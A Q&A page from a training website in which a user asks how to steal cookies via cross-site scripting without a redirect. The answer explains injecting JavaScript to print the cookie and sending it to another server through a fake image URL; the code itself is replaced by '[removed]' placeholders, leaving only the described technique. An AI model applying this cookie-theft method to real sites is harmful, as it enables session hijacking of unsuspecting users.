Can I use the XSS Steal Cookie option without it redirecting me to another page?

331    Asked by Aalapprabhakaran in SQL Server , Asked on Dec 28, 2021

Is it possible for me to steal the XSS cookies without getting redirected to another page? 

A blog had the following paragraph related to the XSS i.e Cross-site scripting, often abbreviated as XSS, is a type of attack in which malicious scripts are injected into websites and web applications for the purpose of running on the end user's device. During this process, unsanitized or unvalidated inputs (user-entered data) are used to change outputs.

Answered by Amanda Hawes

To use the XSS steal cookie option without getting redirected to another page, you have to get the full control of the JavaScript getting written to the page, then you could just do


[removed]('cookie: ' + [removed])

If you want it sent to another server, you could include it in a non-existent image:

[removed]('')

The key here being whether you can output arbitrary JavaScript or whether you're limited in the kind of JavaScript you can get executed. Though if you're limited in what can be output you could use more advanced methods of getting your custom code to execute which are a bit out of scope of the question.

Your Answer

Online Course

Tutorials

Salesforce Tutorial

Software Testing Tutorial

SQL Tutorial

Business Analyst Tutorial

Devops Tutorial

Data Science Tutorial

AWS Tutorial

Hadoop Tutorial

SSRS Tutorial

AWS S3 Tutorial

Functional Testing Tutorial

SSAS Tutorial

Automation Testing Tutorial

Manual Testing Tutorial

Selenium Tutorial

Kubernetes Tutorial

Scala Tutorial

ETL Testing Tutorial

Python Tutorial

Pyspark Tutorial

R Tutorial

Unit Testing Tutorial

API Testing Tutorial

Puppet Tutorial

Integration Testing Tutorial

Chef Tutorial

Jenkins Tutorial

Ansible Tutorial

Vagrant Tutorial

Docker Tutorial

Interviews

Parent Categories

Copyright | JanBaskTraining.com